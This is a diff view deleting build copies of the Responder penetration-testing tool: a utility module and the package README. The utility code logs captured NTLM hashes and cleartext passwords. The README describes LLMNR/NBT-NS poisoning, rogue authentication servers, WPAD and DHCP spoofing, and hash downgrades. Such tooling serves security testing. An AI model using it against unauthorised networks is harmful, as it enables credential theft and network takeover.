key = next(reversed(self))
else:
key = next(iter(self))
value = self.pop(key)
return key, value
def __reduce__(self):
items = [[k, self[k]] for k in self]
tmp = self.__map, self.__end
del self.__map, self.__end
inst_dict = vars(self).copy()
self.__map, self.__end = tmp
if inst_dict:
return (self.__class__, (items,), inst_dict)
return self.__class__, (items,)
def keys(self):
return list(self)
if sys.version_info >= (3, 0):
setdefault = DictMixin.setdefault
update = DictMixin.update
pop = DictMixin.pop
values = DictMixin.values
items = DictMixin.items
iterkeys = DictMixin.keys
itervalues = DictMixin.values
iteritems = DictMixin.items
else:
setdefault = DictMixin.setdefault
update = DictMixin.update
pop = DictMixin.pop
values = DictMixin.values
items = DictMixin.items
iterkeys = DictMixin.iterkeys
itervalues = DictMixin.itervalues
iteritems = DictMixin.iteritems
def __repr__(self):
if not self:
return '%s()' % (self.__class__.__name__,)
return '%s(%r)' % (self.__class__.__name__, list(self.items()))
def copy(self):
return self.__class__(self)
@classmethod
def fromkeys(cls, iterable, value=None):
d = cls()
for key in iterable:
d[key] = value
return d
def __eq__(self, other):
if isinstance(other, OrderedDict):
return len(self)==len(other) and \
min(p==q for p, q in zip(list(self.items()), list(other.items())))
return dict.__eq__(self, other)
def __ne__(self, other):
return not self == other
if __name__ == '__main__':
d = OrderedDict([('foo',2),('bar',3),('baz',4),('zot',5),('arrgh',6)])
assert [x for x in d] == ['foo', 'bar', 'baz', 'zot', 'arrgh']

572
build/lib/Responder/utils.py
View file

@ -1,572 +0,0 @@
#!/usr/bin/env python
# This file is part of Responder, a network take-over set of tools
# created and maintained by Laurent Gaffie.
# email: laurent.gaffie@gmail.com
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
import os
import sys
import re
import logging
import socket
import time
import Responder.settings as settings
import datetime
import codecs
import struct
import random
try:
import netifaces
except:
sys.exit('You need to install python-netifaces or run Responder with python3...\nTry "apt-get install python-netifaces" or "pip install netifaces"')
from calendar import timegm
def if_nametoindex2(name):
if settings.Config.PY2OR3 == "PY2":
import ctypes
import ctypes.util
libc = ctypes.CDLL(ctypes.util.find_library('c'))
ret = libc.if_nametoindex(name)
return ret
else:
return socket.if_nametoindex(settings.Config.Interface)
def RandomChallenge():
if settings.Config.PY2OR3 == "PY3":
if settings.Config.NumChal == "random":
from random import getrandbits
NumChal = b'%016x' % getrandbits(16 * 4)
Challenge = b''
for i in range(0, len(NumChal),2):
Challenge += NumChal[i:i+2]
return codecs.decode(Challenge, 'hex')
else:
return settings.Config.Challenge
else:
if settings.Config.NumChal == "random":
from random import getrandbits
NumChal = '%016x' % getrandbits(16 * 4)
Challenge = ''
for i in range(0, len(NumChal),2):
Challenge += NumChal[i:i+2].decode("hex")
return Challenge
else:
return settings.Config.Challenge
def HTTPCurrentDate():
Date = datetime.datetime.utcnow().strftime('%a, %d %b %Y %H:%M:%S GMT')
return Date
def SMBTime():
dt = datetime.datetime.now()
dt = dt.replace(tzinfo=None)
if settings.Config.PY2OR3 == "PY3":
return struct.pack("<Q",116444736000000000 + (timegm(dt.timetuple()) * 10000000)).decode('latin-1')
else:
return struct.pack("<Q",116444736000000000 + (timegm(dt.timetuple()) * 10000000))
try:
import sqlite3
except:
print("[!] Please install python-sqlite3 extension.")
sys.exit(0)
def color(txt, code = 1, modifier = 0):
if txt.startswith('[*]'):
settings.Config.PoisonersLogger.warning(txt)
elif 'Analyze' in txt:
settings.Config.AnalyzeLogger.warning(txt)
if os.name == 'nt': # No colors for windows...
return txt
return "\033[%d;3%dm%s\033[0m" % (modifier, code, txt)
def text(txt):
stripcolors = re.sub(r'\x1b\[([0-9,A-Z]{1,2}(;[0-9]{1,2})?(;[0-9]{3})?)?[m|K]?', '', txt)
logging.info(stripcolors)
if os.name == 'nt':
return txt
return '\r' + re.sub(r'\[([^]]*)\]', "\033[1;34m[\\1]\033[0m", txt)
def IsOnTheSameSubnet(ip, net):
net += '/24'
ipaddr = int(''.join([ '%02x' % int(x) for x in ip.split('.') ]), 16)
netstr, bits = net.split('/')
netaddr = int(''.join([ '%02x' % int(x) for x in netstr.split('.') ]), 16)
mask = (0xffffffff << (32 - int(bits))) & 0xffffffff
return (ipaddr & mask) == (netaddr & mask)
def RespondToThisIP(ClientIp):
if ClientIp.startswith('127.0.0.'):
return False
elif settings.Config.AutoIgnore and ClientIp in settings.Config.AutoIgnoreList:
print(color('[*]', 3, 1), 'Received request from auto-ignored client %s, not answering.' % ClientIp)
return False
elif settings.Config.RespondTo and ClientIp not in settings.Config.RespondTo:
return False
elif ClientIp in settings.Config.RespondTo or settings.Config.RespondTo == []:
if ClientIp not in settings.Config.DontRespondTo:
return True
return False
def RespondToThisName(Name):
if settings.Config.RespondToName and Name.upper() not in settings.Config.RespondToName:
return False
elif Name.upper() in settings.Config.RespondToName or settings.Config.RespondToName == []:
if Name.upper() not in settings.Config.DontRespondToName:
return True
return False
def RespondToThisHost(ClientIp, Name):
return RespondToThisIP(ClientIp) and RespondToThisName(Name)
def RespondWithIPAton():
if settings.Config.PY2OR3 == "PY2":
if settings.Config.ExternalIP:
return settings.Config.ExternalIPAton
else:
return settings.Config.IP_aton
else:
if settings.Config.ExternalIP:
return settings.Config.ExternalIPAton.decode('latin-1')
else:
return settings.Config.IP_aton.decode('latin-1')
def RespondWithIPPton():
if settings.Config.PY2OR3 == "PY2":
if settings.Config.ExternalIP6:
return settings.Config.ExternalIP6Pton
else:
return settings.Config.IP_Pton6
else:
if settings.Config.ExternalIP6:
return settings.Config.ExternalIP6Pton.decode('latin-1')
else:
return settings.Config.IP_Pton6.decode('latin-1')
def RespondWithIP():
if settings.Config.ExternalIP:
return settings.Config.ExternalIP
else:
return settings.Config.Bind_To
def RespondWithIP6():
if settings.Config.ExternalIP6:
return settings.Config.ExternalIP6
else:
return settings.Config.Bind_To6
def OsInterfaceIsSupported():
if settings.Config.Interface != "Not set":
return not IsOsX()
return False
def IsOsX():
return sys.platform == "darwin"
def IsIPv6IP(IP):
if IP == None:
return False
regex = r"(([0-9a-fA-F]{1,4}:){7,7}[0-9a-fA-F]{1,4}|([0-9a-fA-F]{1,4}:){1,7}:|([0-9a-fA-F]{1,4}:){1,6}:[0-9a-fA-F]{1,4}|([0-9a-fA-F]{1,4}:){1,5}(:[0-9a-fA-F]{1,4}){1,2}|([0-9a-fA-F]{1,4}:){1,4}(:[0-9a-fA-F]{1,4}){1,3}|([0-9a-fA-F]{1,4}:){1,3}(:[0-9a-fA-F]{1,4}){1,4}|([0-9a-fA-F]{1,4}:){1,2}(:[0-9a-fA-F]{1,4}){1,5}|[0-9a-fA-F]{1,4}:((:[0-9a-fA-F]{1,4}){1,6})|:((:[0-9a-fA-F]{1,4}){1,7}|:)|fe80:(:[0-9a-fA-F]{0,4}){0,4}%[0-9a-zA-Z]{1,}|::(ffff(:0{1,4}){0,1}:){0,1}((25[0-5]|(2[0-4]|1{0,1}[0-9]){0,1}[0-9])\.){3,3}(25[0-5]|(2[0-4]|1{0,1}[0-9]){0,1}[0-9])|([0-9a-fA-F]{1,4}:){1,4}:((25[0-5]|(2[0-4]|1{0,1}[0-9]){0,1}[0-9])\.){3,3}(25[0-5]|(2[0-4]|1{0,1}[0-9]){0,1}[0-9]))"
ret = re.search(regex, IP)
if ret:
return True
else:
return False
def FindLocalIP(Iface, OURIP):
if Iface == 'ALL':
return '0.0.0.0'
try:
if IsOsX():
return OURIP
elif IsIPv6IP(OURIP):
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
s.setsockopt(socket.SOL_SOCKET, 25, str(Iface+'\0').encode('utf-8'))
s.connect(("127.0.0.1",9))#RFC 863
ret = s.getsockname()[0]
s.close()
return ret
elif IsIPv6IP(OURIP) == False and OURIP != None:
return OURIP
elif OURIP == None:
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
s.setsockopt(socket.SOL_SOCKET, 25, str(Iface+'\0').encode('utf-8'))
s.connect(("127.0.0.1",9))#RFC 863
ret = s.getsockname()[0]
s.close()
return ret
except socket.error:
print(color("[!] Error: %s: Interface not found" % Iface, 1))
sys.exit(-1)
def Probe_IPv6_socket():
"""Return true is IPv6 sockets are really supported, and False when IPv6 is not supported."""
if not socket.has_ipv6:
return False
try:
with socket.socket(socket.AF_INET6, socket.SOCK_STREAM) as s:
s.bind(("::1", 0))
return True
except:
return False
def FindLocalIP6(Iface, OURIP):
if Iface == 'ALL':
return '::'
try:
if IsIPv6IP(OURIP) == False:
try:
#Let's make it random so we don't get spotted easily.
randIP = "2001:" + ":".join(("%x" % random.randint(0, 16**4) for i in range(7)))
s = socket.socket(socket.AF_INET6, socket.SOCK_DGRAM)
s.connect((randIP+':80', 1))
IP = s.getsockname()[0]
return IP
except:
try:
#Try harder; Let's get the local link addr
IP = str(netifaces.ifaddresses(Iface)[netifaces.AF_INET6][0]["addr"].replace("%"+Iface, ""))
return IP
except:
IP = '::1'
print("[+] You don't have an IPv6 address assigned.")
return IP
else:
return OURIP
except socket.error:
print(color("[!] Error: %s: Interface not found" % Iface, 1))
sys.exit(-1)
# Function used to write captured hashs to a file.
def WriteData(outfile, data, user):
logging.info("[*] Captured Hash: %s" % data)
if not os.path.isfile(outfile):
with open(outfile,"w") as outf:
outf.write(data + '\n')
return
with open(outfile,"r") as filestr:
if re.search(user.encode('hex'), filestr.read().encode('hex')):
return False
elif re.search(re.escape("$"), user):
return False
with open(outfile,"a") as outf2:
outf2.write(data + '\n')
# Function used to write debug config and network info.
def DumpConfig(outfile, data):
with open(outfile,"a") as dump:
dump.write(data + '\n')
def StructPython2or3(endian,data):
#Python2...
if settings.Config.PY2OR3 == "PY2":
return struct.pack(endian, len(data))
#Python3...
else:
return struct.pack(endian, len(data)).decode('latin-1')
def StructWithLenPython2or3(endian,data):
#Python2...
if settings.Config.PY2OR3 == "PY2":
return struct.pack(endian, data)
#Python3...
else:
return struct.pack(endian, data).decode('latin-1')
def NetworkSendBufferPython2or3(data):
if settings.Config.PY2OR3 == "PY2":
return str(data)
else:
return bytes(str(data), 'latin-1')
def NetworkRecvBufferPython2or3(data):
if settings.Config.PY2OR3 == "PY2":
return str(data)
else:
return str(data.decode('latin-1'))
def CreateResponderDb():
if not os.path.exists(settings.Config.DatabaseFile):
cursor = sqlite3.connect(settings.Config.DatabaseFile)
cursor.execute('CREATE TABLE Poisoned (timestamp TEXT, Poisoner TEXT, SentToIp TEXT, ForName TEXT, AnalyzeMode TEXT)')
cursor.commit()
cursor.execute('CREATE TABLE responder (timestamp TEXT, module TEXT, type TEXT, client TEXT, hostname TEXT, user TEXT, cleartext TEXT, hash TEXT, fullhash TEXT)')
cursor.commit()
cursor.execute('CREATE TABLE DHCP (timestamp TEXT, MAC TEXT, IP TEXT, RequestedIP TEXT)')
cursor.commit()
cursor.close()
def SaveToDb(result):
for k in [ 'module', 'type', 'client', 'hostname', 'user', 'cleartext', 'hash', 'fullhash' ]:
if not k in result:
result[k] = ''
result['client'] = result['client'].replace("::ffff:","")
if len(result['user']) < 2:
print(color('[*] Skipping one character username: %s' % result['user'], 3, 1))
text("[*] Skipping one character username: %s" % result['user'])
return
cursor = sqlite3.connect(settings.Config.DatabaseFile)
cursor.text_factory = sqlite3.Binary # We add a text factory to support different charsets
if len(result['cleartext']):
fname = '%s-%s-ClearText-%s.txt' % (result['module'], result['type'], result['client'])
res = cursor.execute("SELECT COUNT(*) AS count FROM responder WHERE module=? AND type=? AND client=? AND LOWER(user)=LOWER(?) AND cleartext=?", (result['module'], result['type'], result['client'], result['user'], result['cleartext']))
else:
fname = '%s-%s-%s.txt' % (result['module'], result['type'], result['client'])
res = cursor.execute("SELECT COUNT(*) AS count FROM responder WHERE module=? AND type=? AND client=? AND LOWER(user)=LOWER(?)", (result['module'], result['type'], result['client'], result['user']))
(count,) = res.fetchone()
logfile = os.path.join(settings.Config.ResponderPATH, 'logs', fname)
if not count:
cursor.execute("INSERT INTO responder VALUES(datetime('now'), ?, ?, ?, ?, ?, ?, ?, ?)", (result['module'], result['type'], result['client'], result['hostname'], result['user'], result['cleartext'], result['hash'], result['fullhash']))
cursor.commit()
if not count or settings.Config.CaptureMultipleHashFromSameHost:
with open(logfile,"a") as outf:
if len(result['cleartext']): # If we obtained cleartext credentials, write them to file
outf.write('%s:%s\n' % (result['user'].encode('utf8', 'replace'), result['cleartext'].encode('utf8', 'replace')))
else: # Otherwise, write JtR-style hash string to file
outf.write(result['fullhash'] + '\n')#.encode('utf8', 'replace') + '\n')
if not count or settings.Config.Verbose: # Print output
if len(result['client']):
print(text("[%s] %s Client : %s" % (result['module'], result['type'], color(result['client'], 3))))
if len(result['hostname']):
print(text("[%s] %s Hostname : %s" % (result['module'], result['type'], color(result['hostname'], 3))))
if len(result['user']):
print(text("[%s] %s Username : %s" % (result['module'], result['type'], color(result['user'], 3))))
# Bu order of priority, print cleartext, fullhash, or hash
if len(result['cleartext']):
print(text("[%s] %s Password : %s" % (result['module'], result['type'], color(result['cleartext'], 3))))
elif len(result['fullhash']):
print(text("[%s] %s Hash : %s" % (result['module'], result['type'], color(result['fullhash'], 3))))
elif len(result['hash']):
print(text("[%s] %s Hash : %s" % (result['module'], result['type'], color(result['hash'], 3))))
# Appending auto-ignore list if required
# Except if this is a machine account's hash
if settings.Config.AutoIgnore and not result['user'].endswith('$'):
settings.Config.AutoIgnoreList.append(result['client'])
print(color('[*] Adding client %s to auto-ignore list' % result['client'], 4, 1))
elif len(result['cleartext']):
print(color('[*] Skipping previously captured cleartext password for %s' % result['user'], 3, 1))
text('[*] Skipping previously captured cleartext password for %s' % result['user'])
else:
print(color('[*] Skipping previously captured hash for %s' % result['user'], 3, 1))
text('[*] Skipping previously captured hash for %s' % result['user'])
cursor.execute("UPDATE responder SET timestamp=datetime('now') WHERE user=? AND client=?", (result['user'], result['client']))
cursor.commit()
cursor.close()
def SavePoisonersToDb(result):
for k in [ 'Poisoner', 'SentToIp', 'ForName', 'AnalyzeMode' ]:
if not k in result:
result[k] = ''
result['SentToIp'] = result['SentToIp'].replace("::ffff:","")
cursor = sqlite3.connect(settings.Config.DatabaseFile)
cursor.text_factory = sqlite3.Binary # We add a text factory to support different charsets
res = cursor.execute("SELECT COUNT(*) AS count FROM Poisoned WHERE Poisoner=? AND SentToIp=? AND ForName=? AND AnalyzeMode=?", (result['Poisoner'], result['SentToIp'], result['ForName'], result['AnalyzeMode']))
(count,) = res.fetchone()
if not count:
cursor.execute("INSERT INTO Poisoned VALUES(datetime('now'), ?, ?, ?, ?)", (result['Poisoner'], result['SentToIp'], result['ForName'], result['AnalyzeMode']))
cursor.commit()
cursor.close()
def SaveDHCPToDb(result):
for k in [ 'MAC', 'IP', 'RequestedIP']:
if not k in result:
result[k] = ''
cursor = sqlite3.connect(settings.Config.DatabaseFile)
cursor.text_factory = sqlite3.Binary # We add a text factory to support different charsets
res = cursor.execute("SELECT COUNT(*) AS count FROM DHCP WHERE MAC=? AND IP=? AND RequestedIP=?", (result['MAC'], result['IP'], result['RequestedIP']))
(count,) = res.fetchone()
if not count:
cursor.execute("INSERT INTO DHCP VALUES(datetime('now'), ?, ?, ?)", (result['MAC'], result['IP'], result['RequestedIP']))
cursor.commit()
cursor.close()
def Parse_IPV6_Addr(data):
if data[len(data)-4:len(data)] == b'\x00\x1c\x00\x01':
return 'IPv6'
elif data[len(data)-4:len(data)] == b'\x00\x01\x00\x01':
return True
elif data[len(data)-4:len(data)] == b'\x00\xff\x00\x01':
return True
return False
def IsIPv6(data):
if "::ffff:" in data:
return False
else:
return True
def Decode_Name(nbname): #From http://code.google.com/p/dpkt/ with author's permission.
try:
from string import printable
if len(nbname) != 32:
return nbname
l = []
for i in range(0, 32, 2):
l.append(chr(((ord(nbname[i]) - 0x41) << 4) | ((ord(nbname[i+1]) - 0x41) & 0xf)))
return ''.join(list(filter(lambda x: x in printable, ''.join(l).split('\x00', 1)[0].replace(' ', ''))))
except:
return "Illegal NetBIOS name"
def NBT_NS_Role(data):
return {
"\x41\x41\x00":"Workstation/Redirector",
"\x42\x4c\x00":"Domain Master Browser",
"\x42\x4d\x00":"Domain Controller",
"\x42\x4e\x00":"Local Master Browser",
"\x42\x4f\x00":"Browser Election",
"\x43\x41\x00":"File Server",
"\x41\x42\x00":"Browser",
}.get(data, 'Service not known')
def banner():
banner = "\n".join([
' __',
' .----.-----.-----.-----.-----.-----.--| |.-----.----.',
' | _| -__|__ --| _ | _ | | _ || -__| _|',
' |__| |_____|_____| __|_____|__|__|_____||_____|__|',
' |__|'
])
print(banner)
print("\n \033[1;33mNBT-NS, LLMNR & MDNS %s\033[0m" % settings.__version__)
print('')
print(" To support this project:")
print(" Github -> https://github.com/sponsors/lgandx")
print(" Paypal -> https://paypal.me/PythonResponder")
print('')
print(" Author: Laurent Gaffie (laurent.gaffie@gmail.com)")
print(" To kill this script hit CTRL-C")
print('')
def StartupMessage():
enabled = color('[ON]', 2, 1)
disabled = color('[OFF]', 1, 1)
print('')
print(color("[+] ", 2, 1) + "Poisoners:")
print(' %-27s' % "LLMNR" + (enabled if settings.Config.AnalyzeMode == False else disabled))
print(' %-27s' % "NBT-NS" + (enabled if settings.Config.AnalyzeMode == False else disabled))
print(' %-27s' % "MDNS" + (enabled if settings.Config.AnalyzeMode == False else disabled))
print(' %-27s' % "DNS" + enabled)
print(' %-27s' % "DHCP" + (enabled if settings.Config.DHCP_On_Off else disabled))
print('')
print(color("[+] ", 2, 1) + "Servers:")
print(' %-27s' % "HTTP server" + (enabled if settings.Config.HTTP_On_Off else disabled))
print(' %-27s' % "HTTPS server" + (enabled if settings.Config.SSL_On_Off else disabled))
print(' %-27s' % "WPAD proxy" + (enabled if settings.Config.WPAD_On_Off else disabled))
print(' %-27s' % "Auth proxy" + (enabled if settings.Config.ProxyAuth_On_Off else disabled))
print(' %-27s' % "SMB server" + (enabled if settings.Config.SMB_On_Off else disabled))
print(' %-27s' % "Kerberos server" + (enabled if settings.Config.Krb_On_Off else disabled))
print(' %-27s' % "SQL server" + (enabled if settings.Config.SQL_On_Off else disabled))
print(' %-27s' % "FTP server" + (enabled if settings.Config.FTP_On_Off else disabled))
print(' %-27s' % "IMAP server" + (enabled if settings.Config.IMAP_On_Off else disabled))
print(' %-27s' % "POP3 server" + (enabled if settings.Config.POP_On_Off else disabled))
print(' %-27s' % "SMTP server" + (enabled if settings.Config.SMTP_On_Off else disabled))
print(' %-27s' % "DNS server" + (enabled if settings.Config.DNS_On_Off else disabled))
print(' %-27s' % "LDAP server" + (enabled if settings.Config.LDAP_On_Off else disabled))
print(' %-27s' % "MQTT server" + (enabled if settings.Config.MQTT_On_Off else disabled))
print(' %-27s' % "RDP server" + (enabled if settings.Config.RDP_On_Off else disabled))
print(' %-27s' % "DCE-RPC server" + (enabled if settings.Config.DCERPC_On_Off else disabled))
print(' %-27s' % "WinRM server" + (enabled if settings.Config.WinRM_On_Off else disabled))
print(' %-27s' % "SNMP server" + (enabled if settings.Config.SNMP_On_Off else disabled))
print('')
print(color("[+] ", 2, 1) + "HTTP Options:")
print(' %-27s' % "Always serving EXE" + (enabled if settings.Config.Serve_Always else disabled))
print(' %-27s' % "Serving EXE" + (enabled if settings.Config.Serve_Exe else disabled))
print(' %-27s' % "Serving HTML" + (enabled if settings.Config.Serve_Html else disabled))
print(' %-27s' % "Upstream Proxy" + (enabled if settings.Config.Upstream_Proxy else disabled))
#print(' %-27s' % "WPAD script" + settings.Config.WPAD_Script
print('')
print(color("[+] ", 2, 1) + "Poisoning Options:")
print(' %-27s' % "Analyze Mode" + (enabled if settings.Config.AnalyzeMode else disabled))
print(' %-27s' % "Force WPAD auth" + (enabled if settings.Config.Force_WPAD_Auth else disabled))
print(' %-27s' % "Force Basic Auth" + (enabled if settings.Config.Basic else disabled))
print(' %-27s' % "Force LM downgrade" + (enabled if settings.Config.LM_On_Off == True else disabled))
print(' %-27s' % "Force ESS downgrade" + (enabled if settings.Config.NOESS_On_Off == True or settings.Config.LM_On_Off == True else disabled))
print('')
print(color("[+] ", 2, 1) + "Generic Options:")
print(' %-27s' % "Responder NIC" + color('[%s]' % settings.Config.Interface, 5, 1))
print(' %-27s' % "Responder IP" + color('[%s]' % settings.Config.Bind_To, 5, 1))
print(' %-27s' % "Responder IPv6" + color('[%s]' % settings.Config.Bind_To6, 5, 1))
if settings.Config.ExternalIP:
print(' %-27s' % "Responder external IP" + color('[%s]' % settings.Config.ExternalIP, 5, 1))
if settings.Config.ExternalIP6:
print(' %-27s' % "Responder external IPv6" + color('[%s]' % settings.Config.ExternalIP6, 5, 1))
print(' %-27s' % "Challenge set" + color('[%s]' % settings.Config.NumChal, 5, 1))
if settings.Config.Upstream_Proxy:
print(' %-27s' % "Upstream Proxy" + color('[%s]' % settings.Config.Upstream_Proxy, 5, 1))
if len(settings.Config.RespondTo):
print(' %-27s' % "Respond To" + color(str(settings.Config.RespondTo), 5, 1))
if len(settings.Config.RespondToName):
print(' %-27s' % "Respond To Names" + color(str(settings.Config.RespondToName), 5, 1))
if len(settings.Config.DontRespondTo):
print(' %-27s' % "Don't Respond To" + color(str(settings.Config.DontRespondTo), 5, 1))
if len(settings.Config.DontRespondToName):
print(' %-27s' % "Don't Respond To Names" + color(str(settings.Config.DontRespondToName), 5, 1))
if settings.Config.TTL == None:
print(' %-27s' % "TTL for poisoned response "+ color('[default]', 5, 1))
else:
print(' %-27s' % "TTL for poisoned response" + color(str(settings.Config.TTL.encode().hex()) + " ("+ str(int.from_bytes(str.encode(settings.Config.TTL),"big")) +" seconds)", 5, 1))
print('')
print(color("[+] ", 2, 1) + "Current Session Variables:")
print(' %-27s' % "Responder Machine Name" + color('[%s]' % settings.Config.MachineName, 5, 1))
print(' %-27s' % "Responder Domain Name" + color('[%s]' % settings.Config.DomainName, 5, 1))
print(' %-27s' % "Responder DCE-RPC Port " + color('[%s]' % settings.Config.RPCPort, 5, 1))

921
responder.egg-info/PKG-INFO
View file

@ -1,921 +0,0 @@
Metadata-Version: 2.1
Name: responder
Version: 0.0.0
Summary: IPv6/IPv4 LLMNR/NBT-NS/mDNS Poisoner and NTLMv1/2 Relay.
Author-email: Laurent Gaffie <laurent.gaffie@gmail.com>
License: GNU GENERAL PUBLIC LICENSE
Version 3, 29 June 2007
Copyright (C) 2007 Free Software Foundation, Inc. <http://fsf.org/>
Everyone is permitted to copy and distribute verbatim copies
of this license document, but changing it is not allowed.
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the GNU General Public License is intended to guarantee your freedom to
share and change all versions of a program--to make sure it remains free
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Project-URL: Repository, https://github.com/lgandx/Responder
Project-URL: Issues, https://github.com/lgandx/Responder/issues
Project-URL: Changelog, https://github.com/lgandx/Responder/CHANGELOG.md
Keywords: LLMNR,Poisoning,Windows,SMB,Relay,NBT-NS,NTLM
Classifier: Intended Audience :: Developers
Classifier: License :: GPL
Classifier: Programming Language :: Python 3
Classifier: Programming Language :: Python 3.6
Classifier: Programming Language :: Python 3.7
Classifier: Programming Language :: Python 3.8
Classifier: Programming Language :: Python 3.9
Classifier: Programming Language :: Python 3.10
Classifier: Programming Language :: Python 3.11
Classifier: Programming Language :: Python 3.12
Requires-Python: >=3.6
Description-Content-Type: text/markdown
License-File: LICENSE
Requires-Dist: netifaces>=0.10.4
# Responder/MultiRelay #
IPv6/IPv4 LLMNR/NBT-NS/mDNS Poisoner and NTLMv1/2 Relay.
Author: Laurent Gaffie <laurent.gaffie@gmail.com > https://g-laurent.blogspot.com
## Intro ##
Responder is an LLMNR, NBT-NS and MDNS poisoner.
## Features ##
- Dual IPv6/IPv4 stack.
- Built-in SMB Auth server.
Supports NTLMv1, NTLMv2 hashes with Extended Security NTLMSSP by default. Successfully tested from Windows 95 to Server 2022, Samba and Mac OSX Lion. Clear text password is supported for NT4, and LM hashing downgrade when the --lm option is set. If --disable-ess is set, extended session security will be disabled for NTLMv1 authentication. SMBv2 has also been implemented and is supported by default.
- Built-in MSSQL Auth server.
This server supports NTLMv1, LMv2 hashes. This functionality was successfully tested on Windows SQL Server 2005, 2008, 2012, 2019.
- Built-in HTTP Auth server.
This server supports NTLMv1, NTLMv2 hashes *and* Basic Authentication. This server was successfully tested on IE 6 to IE 11, Edge, Firefox, Chrome, Safari.
Note: This module also works for WebDav NTLM authentication issued from Windows WebDav clients (WebClient). You can now send your custom files to a victim.
- Built-in HTTPS Auth server.
Same as above. The folder certs/ contains 2 default keys, including a dummy private key. This is *intentional*, the purpose is to have Responder working out of the box. A script was added in case you need to generate your own self signed key pair.
- Built-in LDAP Auth server.
This server supports NTLMSSP hashes and Simple Authentication (clear text authentication). This server was successfully tested on Windows Support tool "ldp" and LdapAdmin.
- Built-in DCE-RPC Auth server.
This server supports NTLMSSP hashes. This server was successfully tested on Windows XP to Server 2019.
- Built-in FTP, POP3, IMAP, SMTP Auth servers.
This modules will collect clear text credentials.
- Built-in DNS server.
This server will answer type SRV and A queries. This is really handy when it's combined with ARP spoofing.
- Built-in WPAD Proxy Server.
This module will capture all HTTP requests from anyone launching Internet Explorer on the network if they have "Auto-detect settings" enabled. This module is highly effective. You can configure your custom PAC script in Responder.conf and inject HTML into the server's responses. See Responder.conf.
- Browser Listener
This module allows to find the PDC in stealth mode.
- Icmp Redirect
python tools/Icmp-Redirect.py
For MITM on Windows XP/2003 and earlier Domain members. This attack combined with the DNS module is pretty effective.
- Rogue DHCP
python tools/DHCP.py
DHCP Inform Spoofing. Allows you to let the real DHCP Server issue IP addresses, and then send a DHCP Inform answer to set your IP address as a primary DNS server, and your own WPAD URL. To inject a DNS server, domain, route on all Windows version and any linux box, use -R
- Analyze mode.
This module allows you to see NBT-NS, BROWSER, LLMNR, DNS requests on the network without poisoning any responses. Also, you can map domains, MSSQL servers, workstations passively, see if ICMP Redirects attacks are plausible on your subnet.
## Hashes ##
All hashes are printed to stdout and dumped in a unique John Jumbo compliant file, using this format:
(MODULE_NAME)-(HASH_TYPE)-(CLIENT_IP).txt
Log files are located in the "logs/" folder. Hashes will be logged and printed only once per user per hash type, unless you are using the Verbose mode (-v).
- Responder will log all its activity to Responder-Session.log
- Analyze mode will be logged to Analyzer-Session.log
- Poisoning will be logged to Poisoners-Session.log
Additionally, all captured hashed are logged into an SQLite database which you can configure in Responder.conf
## Considerations ##
- This tool listens on several ports: UDP 137, UDP 138, UDP 53, UDP/TCP 389,TCP 1433, UDP 1434, TCP 80, TCP 135, TCP 139, TCP 445, TCP 21, TCP 3141,TCP 25, TCP 110, TCP 587, TCP 3128, Multicast UDP 5355 and 5353.
- If you run Samba on your system, stop smbd and nmbd and all other services listening on these ports.
- For Ubuntu users:
Edit this file /etc/NetworkManager/NetworkManager.conf and comment the line: `dns=dnsmasq`. Then kill dnsmasq with this command (as root): `killall dnsmasq -9`
- Any rogue server can be turned off in Responder.conf.
- This tool is not meant to work on Windows.
- For OSX, please note: Responder must be launched with an IP address for the -i flag (e.g. -i YOUR_IP_ADDR). There is no native support in OSX for custom interface binding. Using -i en1 will not work. Also to run Responder with the best experience, run the following as root:
launchctl unload /System/Library/LaunchDaemons/com.apple.Kerberos.kdc.plist
launchctl unload /System/Library/LaunchDaemons/com.apple.mDNSResponder.plist
launchctl unload /System/Library/LaunchDaemons/com.apple.smbd.plist
launchctl unload /System/Library/LaunchDaemons/com.apple.netbiosd.plist
## Usage ##
First of all, please take a look at Responder.conf and tweak it for your needs.
Running the tool:
./Responder.py [options]
Typical Usage Example:
./Responder.py -I eth0 -Pv
Options:
--version show program's version number and exit
-h, --help show this help message and exit
-A, --analyze Analyze mode. This option allows you to see NBT-NS,
BROWSER, LLMNR requests without responding.
-I eth0, --interface=eth0
Network interface to use, you can use 'ALL' as a
wildcard for all interfaces
-i 10.0.0.21, --ip=10.0.0.21
Local IP to use (only for OSX)
-6 2002:c0a8:f7:1:3ba8:aceb:b1a9:81ed, --externalip6=2002:c0a8:f7:1:3ba8:aceb:b1a9:81ed
Poison all requests with another IPv6 address than
Responder's one.
-e 10.0.0.22, --externalip=10.0.0.22
Poison all requests with another IP address than
Responder's one.
-b, --basic Return a Basic HTTP authentication. Default: NTLM
-d, --DHCP Enable answers for DHCP broadcast requests. This
option will inject a WPAD server in the DHCP response.
Default: False
-D, --DHCP-DNS This option will inject a DNS server in the DHCP
response, otherwise a WPAD server will be added.
Default: False
-w, --wpad Start the WPAD rogue proxy server. Default value is
False
-u UPSTREAM_PROXY, --upstream-proxy=UPSTREAM_PROXY
Upstream HTTP proxy used by the rogue WPAD Proxy for
outgoing requests (format: host:port)
-F, --ForceWpadAuth Force NTLM/Basic authentication on wpad.dat file
retrieval. This may cause a login prompt. Default:
False
-P, --ProxyAuth Force NTLM (transparently)/Basic (prompt)
authentication for the proxy. WPAD doesn't need to be
ON. Default: False
--lm Force LM hashing downgrade for Windows XP/2003 and
earlier. Default: False
--disable-ess Force ESS downgrade. Default: False
-v, --verbose Increase verbosity.
## Donation ##
You can contribute to this project by donating to the following $XLM (Stellar Lumens) address:
"GCGBMO772FRLU6V4NDUKIEXEFNVSP774H2TVYQ3WWHK4TEKYUUTLUKUH"
Paypal:
https://paypal.me/PythonResponder
## Acknowledgments ##
Late Responder development has been possible because of the donations received from individuals and companies.
We would like to thanks those major sponsors:
- SecureWorks: https://www.secureworks.com/
- Synacktiv: https://www.synacktiv.com/
- Black Hills Information Security: http://www.blackhillsinfosec.com/
- TrustedSec: https://www.trustedsec.com/
- Red Siege Information Security: https://www.redsiege.com/
- Open-Sec: http://www.open-sec.com/
